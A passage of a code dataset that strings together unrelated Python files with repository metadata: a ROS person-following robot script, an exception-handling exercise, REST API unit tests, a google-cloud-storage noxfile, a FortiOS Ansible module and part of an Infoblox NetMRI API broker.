"bottle", "bus", "car", "cat", "chair", "cow", "diningtable",
"dog", "horse", "motorbike", "person", "pottedplant", "sheep",
"sofa", "train", "tvmonitor"]
COLORS = np.random.uniform(0, 255, size=(len(CLASSES), 3))
# load our serialized model from disk
print("[INFO] loading model...")
net = cv2.dnn.readNetFromCaffe(args["prototxt"], args["model"])
# initialize the video stream, allow the camera sensor to warm up,
# and initialize the FPS counter
print("[INFO] starting video stream...")
vs = VideoStream(src=3).start()
time.sleep(2.0)
fps = FPS().start()
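# Rough reading of the controller in move_robot() below (the gains 1.2 and
# 1/30 and the 0.4 m/s cap are taken directly from the code): the frame is
# resized to a width of 400 px, so ((startX+endX)/400)-1 maps the bounding-box
# centre to roughly [-1, 1]; the angular velocity steers toward that centre and
# is zeroed when obstacle_detected is 0 (an obstacle is close). The linear
# velocity grows with startY, i.e. with how low the top of the box sits in the
# frame, which loosely tracks how far away the person appears. When the person
# is lost the robot turns slowly toward the side where they were last seen.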
def move_robot(obstacle_detected,person_lost):
global vel_msg
global startX
global startY
global endX
global endY
global last_endX
global last_startX
if person_lost==0:
vel_msg.angular.z=-obstacle_detected*(((startX+endX)/400)-1)*1.2
vel_msg.linear.x=((startY/8)-1)/30
elif person_lost==1:
vel_msg.angular.z=0.3
vel_msg.linear.x=0.1
else:
vel_msg.angular.z=-0.3
vel_msg.linear.x=0.1
if vel_msg.linear.x>0.4:
vel_msg.linear.x=0.4
_cmd_pub.publish(vel_msg)
if startX!=0 and endX!=0:
last_endX=endX
last_startX=startX
return last_endX,last_startX
def laser_detection(data):
Lengths = len(data.ranges)
total_range_left=0.0
total_range_right=0.0
mean_dist_right=0.0
mean_dist_left=0.0
global obstacle_detected
global vel_msg
for i in range(0,242):
if data.ranges[i]<0.5:
total_range_right+=data.ranges[i]
for i in range(484,726):
if data.ranges[i]<0.5:
total_range_left+=data.ranges[i]
mean_dist_left=total_range_left/242
mean_dist_right=total_range_right/242
if (mean_dist_right>0.01 and mean_dist_right<0.16) or (mean_dist_left>0.01 and mean_dist_left<0.16) and vel_msg.angular.z>0.1 :
obstacle_detected=0
else:
obstacle_detected=1
return obstacle_detected
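# Note on the callback above: the scan is assumed to have roughly 726 rays;
# indices 0-241 are treated as the right sector and 484-725 as the left. Only
# returns closer than 0.5 m are summed and each sum is divided by the sector
# size (242). When that value falls between 0.01 and 0.16 the corresponding
# side is considered blocked and obstacle_detected is cleared to 0 (the
# left-hand check is additionally gated by the current angular velocity, as
# written), which in turn zeroes the rotation term in move_robot().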
def person_recognition():
global startX
global startY
global endX
global endY
global idx
global person_lost
global start_robot
# grab the frame from the threaded video stream and resize it
# to have a maximum width of 400 pixels
frame = vs.read()
frame = imutils.resize(frame, width=400)
# grab the frame dimensions and convert it to a blob
(h, w) = frame.shape[:2]
blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)),
0.007843, (300, 300), 127.5)
# pass the blob through the network and obtain the detections and
# predictions
net.setInput(blob)
detections = net.forward()
if last_endX<200 and last_startX<50 and idx==0 and start_robot==1:
person_lost=1
move_robot(obstacle_detected,person_lost)
elif last_endX>350 and last_startX>200 and idx==0 and start_robot==1:
person_lost=2
move_robot(obstacle_detected,person_lost)
else:
print("depart")
# loop over the detections
for i in np.arange(0, detections.shape[2]):
# extract the confidence (i.e., probability) associated with
# the prediction
confidence = detections[0, 0, i, 2]
# filter out weak detections by ensuring the `confidence` is
# greater than the minimum confidence
if confidence > args["confidence"]:
# extract the index of the class label from the
# `detections`, then compute the (x, y)-coordinates of
# the bounding box for the object
idx = int(detections[0, 0, i, 1])
#idx15 is the index of the person
if idx==15:
start_robot=1
person_lost=0
move_robot(obstacle_detected,person_lost)
box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])
(startX, startY, endX, endY) = box.astype("int")
# draw the prediction on the frame
label = "{}: {:.2f}%".format(CLASSES[idx],
confidence * 100)
cv2.rectangle(frame, (startX, startY), (endX, endY),
COLORS[idx], 2)
y = startY - 15 if startY - 15 > 15 else startY + 15
cv2.putText(frame, label, (startX, y),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[idx], 2)
else:
idx=0
# show the output frame
cv2.imshow("Frame", frame)
# update the FPS counter
fps.update()
if __name__ == '__main__':
rospy.init_node('person_tracking', anonymous=True)
_cmd_pub = rospy.Publisher('/cmd_vel_mux/input/navi', Twist, queue_size=1)
rospy.Subscriber('/scan', LaserScan, laser_detection)
while True:
person_recognition()
print("startx="+str(startX))
print("endx="+str(endX))
print("person_lost="+str(person_lost))
print("idx="+str(idx))
print("vitesse="+str(vel_msg.linear.x))
print("angulaire="+str(vel_msg.angular.z))
key = cv2.waitKey(1) & 0xFF
if key == ord("q"):
fps.stop()
cv2.destroyAllWindows()
vs.stop()
| 29.045918
| 128
| 0.724925
|
323632b51b01039d6884d39eef1288ccbe680a73
| 916
|
py
|
Python
|
_draft/x_6_9_c.py
|
ofl/kuku2
|
7247fb1862d917d23258ebe7a93dca5939433225
|
[
"MIT"
] | null | null | null |
_draft/x_6_9_c.py
|
ofl/kuku2
|
7247fb1862d917d23258ebe7a93dca5939433225
|
[
"MIT"
] | 1
|
2021-11-13T08:03:04.000Z
|
2021-11-13T08:03:04.000Z
|
_draft/x_6_9_c.py
|
ofl/kuku2
|
7247fb1862d917d23258ebe7a93dca5939433225
|
[
"MIT"
] | null | null | null |
# x_6_9
#
#
class CardError(Exception):
    pass
class StoreError(Exception):
    pass
class StockError(StoreError):
    pass
class ZipcodeError(StoreError):
    pass
class ExpiredError(CardError):
    pass
class NumberError(CardError):
    pass
order_count = input('How many kibidango would you like to order?:')
zipcode = input('Please enter your postal code:')
card_number = input('Please enter your card number (e.g. 0000-0000-0000-0000):')
expired_at = input('Please enter the expiration date (e.g. 2022-03):')
try:
    if int(order_count) > 100:
        raise StockError
    if card_number != '1111-1111-1111-1111':
        raise NumberError
    if expired_at != '2025-03':
        raise ExpiredError
    print('Thank you for your purchase')
except StoreError:
    print('Out of stock')
except CardError as e:
    print('A payment error occurred')
    if isinstance(e, ExpiredError):
        print('The expiration date is incorrect')
    elif isinstance(e, NumberError):
        print('The card number is incorrect')
finally:
    print('We look forward to serving you again')
| 17.615385
| 62
| 0.675764
|
f6c1886cb58f26bd7f951bc947a23fce51e311ba
| 10,282
|
py
|
Python
|
exercises/rest-api/rest_api_test.py
|
Grociu/fork-of-exercism-python
|
8aed8612117d5f9fa9db56a2b4bdc6143f6e15fd
|
[
"MIT"
] | 41
|
2015-02-09T18:08:45.000Z
|
2022-03-06T15:23:32.000Z
|
exercises/rest-api/rest_api_test.py
|
Grociu/fork-of-exercism-python
|
8aed8612117d5f9fa9db56a2b4bdc6143f6e15fd
|
[
"MIT"
] | 21
|
2019-12-28T17:47:06.000Z
|
2021-02-27T19:43:00.000Z
|
exercises/rest-api/rest_api_test.py
|
Grociu/fork-of-exercism-python
|
8aed8612117d5f9fa9db56a2b4bdc6143f6e15fd
|
[
"MIT"
] | 18
|
2016-04-29T14:35:12.000Z
|
2021-06-23T07:32:29.000Z
|
import unittest
import json
from rest_api import RestAPI
# Tests adapted from `problem-specifications//canonical-data.json` @ v1.1.1
class RestAPITest(unittest.TestCase):
def test_no_users(self):
database = {"users": []}
api = RestAPI(database)
response = api.get('/users')
self.assertDictEqual(json.loads(response), database)
def test_add_user(self):
database = {"users": []}
api = RestAPI(database)
payload = json.dumps({
'user': 'Adam'
})
response = api.post('/add', payload)
expected = {
'name': 'Adam',
'owes': {},
'owed_by': {},
'balance': 0
}
self.assertDictEqual(json.loads(response), expected)
def test_get_single_user(self):
database = {
'users': [
{
'name': 'Adam',
'owes': {},
'owed_by': {},
'balance': 0
},
{
'name': 'Bob',
'owes': {},
'owed_by': {},
'balance': 0
}
]
}
api = RestAPI(database)
payload = json.dumps({
'users': ['Bob']
})
response = api.get('/users', payload)
expected = {
'users': [
{
'name': 'Bob',
'owes': {},
'owed_by': {},
'balance': 0
}
]
}
self.assertDictEqual(json.loads(response), expected)
def test_iou_both_users_have_0_balance(self):
database = {
'users': [
{
'name': 'Adam',
'owes': {},
'owed_by': {},
'balance': 0
},
{
'name': 'Bob',
'owes': {},
'owed_by': {},
'balance': 0
}
]
}
api = RestAPI(database)
payload = json.dumps({
'lender': 'Adam',
'borrower': 'Bob',
'amount': 3
})
response = api.post('/iou', payload)
expected = {
'users': [
{
'name': 'Adam',
'owes': {},
'owed_by': {
'Bob': 3
},
'balance': 3
},
{
'name': 'Bob',
'owes': {
'Adam': 3
},
'owed_by': {},
'balance': -3
}
]
}
self.assertDictEqual(json.loads(response), expected)
def test_borrower_has_negative_balance(self):
database = {
'users': [
{
'name': 'Adam',
'owes': {},
'owed_by': {},
'balance': 0
},
{
'name': 'Bob',
'owes': {
'Chuck': 3
},
'owed_by': {},
'balance': -3
},
{
'name': 'Chuck',
'owes': {},
'owed_by': {
'Bob': 3
},
'balance': 3
}
]
}
api = RestAPI(database)
payload = json.dumps({
'lender': 'Adam',
'borrower': 'Bob',
'amount': 3
})
response = api.post('/iou', payload)
expected = {
'users': [
{
'name': 'Adam',
'owes': {},
'owed_by': {
'Bob': 3
},
'balance': 3
},
{
'name': 'Bob',
'owes': {
'Adam': 3,
'Chuck': 3
},
'owed_by': {},
'balance': -6
}
]
}
self.assertDictEqual(json.loads(response), expected)
def test_lender_has_negative_balance(self):
database = {
'users': [
{
'name': 'Adam',
'owes': {},
'owed_by': {},
'balance': 0
},
{
'name': 'Bob',
'owes': {
'Chuck': 3
},
'owed_by': {},
'balance': -3
},
{
'name': 'Chuck',
'owes': {},
'owed_by': {
'Bob': 3
},
'balance': 3
}
]
}
api = RestAPI(database)
payload = json.dumps({
'lender': 'Bob',
'borrower': 'Adam',
'amount': 3
})
response = api.post('/iou', payload)
expected = {
'users': [
{
'name': 'Adam',
'owes': {
'Bob': 3
},
'owed_by': {},
'balance': -3
},
{
'name': 'Bob',
'owes': {
'Chuck': 3
},
'owed_by': {
'Adam': 3
},
'balance': 0
}
]
}
self.assertDictEqual(json.loads(response), expected)
def test_lender_owes_borrower(self):
database = {
"users": [
{
"name": "Adam",
"owes": {
"Bob": 3.0
},
"owed_by": {},
"balance": -3.0
},
{
"name": "Bob",
"owes": {},
"owed_by": {
"Adam": 3.0
},
"balance": 3.0
}
]
}
api = RestAPI(database)
payload = json.dumps({
'lender': 'Adam',
'borrower': 'Bob',
'amount': 2
})
response = api.post('/iou', payload)
expected = {
'users': [
{
"name": "Adam",
"owes": {
"Bob": 1.0
},
"owed_by": {},
"balance": -1.0
},
{
"name": "Bob",
"owes": {},
"owed_by": {
"Adam": 1.0
},
"balance": 1.0
}
]
}
self.assertDictEqual(json.loads(response), expected)
def test_lender_owes_borrower_less_than_new_loan(self):
database = {
"users": [
{
"name": "Adam",
"owes": {
"Bob": 3.0
},
"owed_by": {},
"balance": -3.0
},
{
"name": "Bob",
"owes": {},
"owed_by": {
"Adam": 3.0
},
"balance": 3.0
}
]
}
api = RestAPI(database)
payload = json.dumps({
'lender': 'Adam',
'borrower': 'Bob',
'amount': 4.0
})
response = api.post('/iou', payload)
expected = {
'users': [
{
"name": "Adam",
"owes": {
},
"owed_by": {
"Bob": 1.0
},
"balance": 1.0
},
{
"name": "Bob",
"owes": {
"Adam": 1.0
},
"owed_by": {
},
"balance": -1.0
}
]
}
self.assertDictEqual(json.loads(response), expected)
def test_lender_owes_borrower_same_as_new_loan(self):
database = {
"users": [
{
"name": "Adam",
"owes": {
"Bob": 3.0
},
"owed_by": {},
"balance": -3.0
},
{
"name": "Bob",
"owes": {},
"owed_by": {
"Adam": 3.0
},
"balance": 3.0
}
]
}
api = RestAPI(database)
payload = json.dumps({
'lender': 'Adam',
'borrower': 'Bob',
'amount': 3.0
})
response = api.post('/iou', payload)
expected = {
'users': [
{
"name": "Adam",
"owes": {
},
"owed_by": {
},
"balance": 0.0
},
{
"name": "Bob",
"owes": {
},
"owed_by": {
},
"balance": 0.0
}
]
}
self.assertDictEqual(json.loads(response), expected)
if __name__ == '__main__':
unittest.main()
| 26.986877
| 75
| 0.264637
|
67bfa4eeb220f01ba271e8a17610d6b2b82caa27
| 8,036
|
py
|
Python
|
noxfile.py
|
cojenco/python-storage
|
79b669bbede1cd4f06f1d697b71c7f9f2442fb80
|
[
"Apache-2.0"
] | null | null | null |
noxfile.py
|
cojenco/python-storage
|
79b669bbede1cd4f06f1d697b71c7f9f2442fb80
|
[
"Apache-2.0"
] | null | null | null |
noxfile.py
|
cojenco/python-storage
|
79b669bbede1cd4f06f1d697b71c7f9f2442fb80
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Generated by synthtool. DO NOT EDIT!
from __future__ import absolute_import
import os
import pathlib
import shutil
import nox
BLACK_VERSION = "black==19.10b0"
BLACK_PATHS = ["docs", "google", "tests", "noxfile.py", "setup.py"]
DEFAULT_PYTHON_VERSION = "3.8"
SYSTEM_TEST_PYTHON_VERSIONS = ["2.7", "3.8"]
UNIT_TEST_PYTHON_VERSIONS = ["2.7", "3.6", "3.7", "3.8", "3.9", "3.10"]
CONFORMANCE_TEST_PYTHON_VERSIONS = ["3.8"]
_DEFAULT_STORAGE_HOST = "https://storage.googleapis.com"
CURRENT_DIRECTORY = pathlib.Path(__file__).parent.absolute()
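# Typical local invocations (illustrative; session names follow the
# definitions below, and parametrized sessions use nox's "<session>-<python>"
# naming):
#
#     nox -s lint blacken
#     nox -s unit-3.9
#     nox -s system-3.8      # requires GOOGLE_APPLICATION_CREDENTIALS to be set
#     nox -s cover docs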
@nox.session(python=DEFAULT_PYTHON_VERSION)
def lint(session):
"""Run linters.
Returns a failure if the linters find linting errors or sufficiently
serious code quality issues.
"""
session.install("flake8", BLACK_VERSION)
session.run(
"black", "--check", *BLACK_PATHS,
)
session.run("flake8", "google", "tests")
@nox.session(python=DEFAULT_PYTHON_VERSION)
def blacken(session):
"""Run black.
Format code to uniform standard.
"""
session.install(BLACK_VERSION)
session.run(
"black", *BLACK_PATHS,
)
@nox.session(python=DEFAULT_PYTHON_VERSION)
def lint_setup_py(session):
"""Verify that setup.py is valid (including RST check)."""
session.install("docutils", "pygments")
session.run("python", "setup.py", "check", "--restructuredtext", "--strict")
def default(session):
constraints_path = str(
CURRENT_DIRECTORY / "testing" / f"constraints-{session.python}.txt"
)
# Install all test dependencies, then install this package in-place.
session.install("mock", "pytest", "pytest-cov", "-c", constraints_path)
session.install("-e", ".", "-c", constraints_path)
# Run py.test against the unit tests.
session.run(
"py.test",
"--quiet",
"--cov=google.cloud.storage",
"--cov=google.cloud",
"--cov=tests.unit",
"--cov-append",
"--cov-config=.coveragerc",
"--cov-report=",
"--cov-fail-under=0",
os.path.join("tests", "unit"),
*session.posargs,
)
@nox.session(python=UNIT_TEST_PYTHON_VERSIONS)
def unit(session):
"""Run the unit test suite."""
default(session)
@nox.session(python=SYSTEM_TEST_PYTHON_VERSIONS)
def system(session):
    """Run the system test suite."""
    constraints_path = str(
        CURRENT_DIRECTORY / "testing" / f"constraints-{session.python}.txt"
    )
system_test_path = os.path.join("tests", "system.py")
system_test_folder_path = os.path.join("tests", "system")
# Check the value of `RUN_SYSTEM_TESTS` env var. It defaults to true.
if os.environ.get("RUN_SYSTEM_TESTS", "true") == "false":
session.skip("RUN_SYSTEM_TESTS is set to false, skipping")
# Environment check: Only run tests if the environment variable is set.
if not os.environ.get("GOOGLE_APPLICATION_CREDENTIALS", ""):
session.skip("Credentials must be set via environment variable")
# mTLS tests requires pyopenssl.
if os.environ.get("GOOGLE_API_USE_CLIENT_CERTIFICATE", "") == "true":
session.install("pyopenssl")
system_test_exists = os.path.exists(system_test_path)
system_test_folder_exists = os.path.exists(system_test_folder_path)
# Environment check: only run tests if found.
if not system_test_exists and not system_test_folder_exists:
session.skip("System tests were not found")
# Use pre-release gRPC for system tests.
session.install("--pre", "grpcio")
# Install all test dependencies, then install this package into the
# virtualenv's dist-packages.
    # 2021-05-06: defer installing 'google-cloud-*' to after this package,
    #   in order to work around Python 2.7 googleapis-common-protos
    #   issue.
session.install("mock", "pytest", "-c", constraints_path)
session.install("-e", ".", "-c", constraints_path)
session.install(
"google-cloud-testutils",
"google-cloud-iam",
"google-cloud-pubsub < 2.0.0",
"google-cloud-kms < 2.0dev",
"-c",
constraints_path,
)
# Run py.test against the system tests.
if system_test_exists:
session.run("py.test", "--quiet", system_test_path, *session.posargs)
if system_test_folder_exists:
session.run("py.test", "--quiet", system_test_folder_path, *session.posargs)
@nox.session(python=CONFORMANCE_TEST_PYTHON_VERSIONS)
def conftest_retry(session):
"""Run the retry conformance test suite."""
conformance_test_path = os.path.join("tests", "conformance.py")
conformance_test_folder_path = os.path.join("tests", "conformance")
conformance_test_exists = os.path.exists(conformance_test_path)
conformance_test_folder_exists = os.path.exists(conformance_test_folder_path)
# Environment check: only run tests if found.
if not conformance_test_exists and not conformance_test_folder_exists:
session.skip("Conformance tests were not found")
session.install("pytest",)
session.install("-e", ".")
# Run py.test against the conformance tests.
if conformance_test_exists:
session.run("py.test", "--quiet", conformance_test_path, *session.posargs)
if conformance_test_folder_exists:
session.run(
"py.test", "--quiet", conformance_test_folder_path, *session.posargs
)
@nox.session(python=DEFAULT_PYTHON_VERSION)
def cover(session):
"""Run the final coverage report.
This outputs the coverage report aggregating coverage from the unit
test runs (not system test runs), and then erases coverage data.
"""
session.install("coverage", "pytest-cov")
session.run("coverage", "report", "--show-missing", "--fail-under=100")
session.run("coverage", "erase")
@nox.session(python=DEFAULT_PYTHON_VERSION)
def docs(session):
"""Build the docs for this library."""
session.install("-e", ".")
session.install("sphinx==4.0.1", "alabaster", "recommonmark")
shutil.rmtree(os.path.join("docs", "_build"), ignore_errors=True)
session.run(
"sphinx-build",
"-W", # warnings as errors
"-T", # show full traceback on exception
"-N", # no colors
"-b",
"html",
"-d",
os.path.join("docs", "_build", "doctrees", ""),
os.path.join("docs", ""),
os.path.join("docs", "_build", "html", ""),
)
@nox.session(python=DEFAULT_PYTHON_VERSION)
def docfx(session):
"""Build the docfx yaml files for this library."""
session.install("-e", ".")
session.install("grpcio")
session.install(
"sphinx==4.0.1", "alabaster", "recommonmark", "gcp-sphinx-docfx-yaml"
)
shutil.rmtree(os.path.join("docs", "_build"), ignore_errors=True)
session.run(
"sphinx-build",
"-T", # show full traceback on exception
"-N", # no colors
"-D",
(
"extensions=sphinx.ext.autodoc,"
"sphinx.ext.autosummary,"
"docfx_yaml.extension,"
"sphinx.ext.intersphinx,"
"sphinx.ext.coverage,"
"sphinx.ext.napoleon,"
"sphinx.ext.todo,"
"sphinx.ext.viewcode,"
"recommonmark"
),
"-b",
"html",
"-d",
os.path.join("docs", "_build", "doctrees", ""),
os.path.join("docs", ""),
os.path.join("docs", "_build", "html", ""),
)
| 32.666667
| 84
| 0.649701
|
d503dd6dc640f3e0a5c6e46789b1889d3cd56e2f
| 10,031
|
py
|
Python
|
ansible/venv/lib/python2.7/site-packages/ansible/modules/network/fortios/fortios_system_replacemsg_ec.py
|
gvashchenkolineate/gvashchenkolineate_infra_trytravis
|
0fb18850afe0d8609693ba4b23f29c7cda17d97f
|
[
"MIT"
] | 17
|
2017-06-07T23:15:01.000Z
|
2021-08-30T14:32:36.000Z
|
ansible/venv/lib/python2.7/site-packages/ansible/modules/network/fortios/fortios_system_replacemsg_ec.py
|
gvashchenkolineate/gvashchenkolineate_infra_trytravis
|
0fb18850afe0d8609693ba4b23f29c7cda17d97f
|
[
"MIT"
] | 32
|
2018-10-09T04:13:42.000Z
|
2020-05-11T07:20:28.000Z
|
ansible/venv/lib/python2.7/site-packages/ansible/modules/network/fortios/fortios_system_replacemsg_ec.py
|
gvashchenkolineate/gvashchenkolineate_infra_trytravis
|
0fb18850afe0d8609693ba4b23f29c7cda17d97f
|
[
"MIT"
] | 11
|
2018-10-09T00:14:53.000Z
|
2021-11-03T10:54:09.000Z
|
#!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_system_replacemsg_ec
short_description: Replacement messages in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS (FOS) device by allowing the
user to set and modify system_replacemsg feature and ec category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.0.5
version_added: "2.9"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate IP address.
type: str
required: false
username:
description:
- FortiOS or FortiGate username.
type: str
required: false
password:
description:
- FortiOS or FortiGate password.
type: str
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
type: str
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS protocol.
type: bool
default: true
ssl_verify:
description:
- Ensures FortiGate certificate must be verified by a proper CA.
type: bool
default: true
state:
description:
- Indicates whether to create or remove the object.
type: str
required: true
choices:
- present
- absent
system_replacemsg_ec:
description:
- Replacement messages.
default: null
type: dict
suboptions:
buffer:
description:
- Message string.
type: str
format:
description:
- Format flag.
type: str
choices:
- none
- text
- html
- wml
header:
description:
- Header flag.
type: str
choices:
- none
- http
- 8bit
msg_type:
description:
- Message type.
type: str
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
ssl_verify: "False"
tasks:
- name: Replacement messages.
fortios_system_replacemsg_ec:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
state: "present"
system_replacemsg_ec:
buffer: "<your_own_value>"
format: "none"
header: "none"
msg_type: "<your_own_value>"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG
def login(data, fos):
host = data['host']
username = data['username']
password = data['password']
ssl_verify = data['ssl_verify']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password, verify=ssl_verify)
def filter_system_replacemsg_ec_data(json):
option_list = ['buffer', 'format', 'header',
'msg_type']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
def underscore_to_hyphen(data):
if isinstance(data, list):
        data = [underscore_to_hyphen(elem) for elem in data]
elif isinstance(data, dict):
new_data = {}
for k, v in data.items():
new_data[k.replace('_', '-')] = underscore_to_hyphen(v)
data = new_data
return data
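# Illustration of the key rewrite performed above (keys only; values are left
# untouched unless they are nested containers):
#
#     underscore_to_hyphen({"msg_type": "x", "header": "none"})
#     # -> {"msg-type": "x", "header": "none"}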
def system_replacemsg_ec(data, fos):
vdom = data['vdom']
state = data['state']
system_replacemsg_ec_data = data['system_replacemsg_ec']
filtered_data = underscore_to_hyphen(filter_system_replacemsg_ec_data(system_replacemsg_ec_data))
if state == "present":
return fos.set('system.replacemsg',
'ec',
data=filtered_data,
vdom=vdom)
elif state == "absent":
return fos.delete('system.replacemsg',
'ec',
mkey=filtered_data['msg-type'],
vdom=vdom)
def is_successful_status(status):
return status['status'] == "success" or \
status['http_method'] == "DELETE" and status['http_status'] == 404
def fortios_system_replacemsg(data, fos):
if data['system_replacemsg_ec']:
resp = system_replacemsg_ec(data, fos)
return not is_successful_status(resp), \
resp['status'] == "success", \
resp
def main():
fields = {
"host": {"required": False, "type": "str"},
"username": {"required": False, "type": "str"},
"password": {"required": False, "type": "str", "default": "", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": True},
"ssl_verify": {"required": False, "type": "bool", "default": True},
"state": {"required": True, "type": "str",
"choices": ["present", "absent"]},
"system_replacemsg_ec": {
"required": False, "type": "dict", "default": None,
"options": {
"buffer": {"required": False, "type": "str"},
"format": {"required": False, "type": "str",
"choices": ["none", "text", "html",
"wml"]},
"header": {"required": False, "type": "str",
"choices": ["none", "http", "8bit"]},
"msg_type": {"required": False, "type": "str"}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
# legacy_mode refers to using fortiosapi instead of HTTPAPI
legacy_mode = 'host' in module.params and module.params['host'] is not None and \
'username' in module.params and module.params['username'] is not None and \
'password' in module.params and module.params['password'] is not None
if not legacy_mode:
if module._socket_path:
connection = Connection(module._socket_path)
fos = FortiOSHandler(connection)
is_error, has_changed, result = fortios_system_replacemsg(module.params, fos)
else:
module.fail_json(**FAIL_SOCKET_MSG)
else:
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
fos = FortiOSAPI()
login(module.params, fos)
is_error, has_changed, result = fortios_system_replacemsg(module.params, fos)
fos.logout()
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
| 29.502941
| 101
| 0.596152
|
2cc24ce40dd0be5944ef45c17b02b7192f49653a
| 59,189
|
py
|
Python
|
infoblox_netmri/api/broker/v3_6_0/auth_service_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/auth_service_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/auth_service_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
from ..broker import Broker
class AuthServiceBroker(Broker):
controller = "auth_services"
def show(self, **kwargs):
"""Shows the details for the specified auth service.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: The id of the authentication service.
:type id: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return auth_service: The auth service identified by the specified id.
:rtype auth_service: AuthService
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def index(self, **kwargs):
"""Lists the available auth services. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param id: The id of the authentication service.
:type id: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, service_name, auth_method, description, priority, context_params_json, enabled_ind, enabled_authz_ind, timeout, created_at, updated_at.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each AuthService. Valid values are id, service_name, auth_method, description, priority, context_params_json, enabled_ind, enabled_authz_ind, timeout, created_at, updated_at. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
